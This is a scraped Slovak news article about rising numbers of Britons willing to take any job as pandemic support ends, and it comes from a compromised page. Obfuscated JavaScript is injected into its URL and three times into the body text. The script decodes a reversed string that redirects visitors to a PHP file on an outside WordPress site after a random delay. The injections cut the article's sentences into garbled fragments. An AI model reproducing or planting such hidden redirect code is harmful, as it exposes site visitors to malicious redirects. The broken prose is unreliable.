https://forex.sk/2020/08/06/akcie-<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>do-roka-vyletia-nahor-mysli-si-newyorsky-financny-analytik/

Rastie počet Britov, ktorí zoberú akúkoľvek prácu

S tým, ako pomaly začína vyprchávať účinok štátnej pomoci ekonomike, zvyšuje sa vo Veľkej Británii tlak na trh práce. Väčší počet ľudí bolo v júli ochotných kývnuť na pracovnú ponuku, ktorá nezodpovedá ich kvalifikácii.

Kým ešte začiatkom júna dosahoval v $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dovanie-5g-sieti/“>Spojenom kráľovstve podiel pracovnej sily, ktorá bola ochotná vziať takmer akúkoľvek prácu asi 23 percent, v súčasnosti je to takmer tridsať percent. Najviac sú ľudia ochotní pracovať kdekoľvek z tých sektorov, ktoré boli najviac zasiahnuté koronavírusovou pdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andémiou, respektíve protiepidemickými vládnymi opatreniami. Teda najmä spracovateľský priemysel, reštaurácie a pohostinstvá, turistický ruch alebo voľnočasové aktivity.

Situácia sa bude ešte zhoršovať a konkurencia na britskom pracovnom trhu sa vyostrí. A to hneď, ako budú postupne dobiehať vládne podporné programy na udržanie zamestnanosti. Až tretina britských firiem uvažuje o tom, že počas nasledujúcich troch mesiacov zníži počet svojich zamestnancov. Bezprostredným dôvodom je nedostatok likvidity, a tak si podniky nebudú môcť toľko zamestnancov ako pred nástupom krízy dovoliť.

Pre Veľkú Britániu tiež nie je dobrou správou uviaznutie rozhovorov so zástupcami Európskej únie o nastavení vzájomných vzťahov po uplynutí prechodného obdobia po tom, čo $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopad-brexit-na-britske-akcie/“>Spojené kráľovstvo európsku dvadsať osmičku opustila.

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *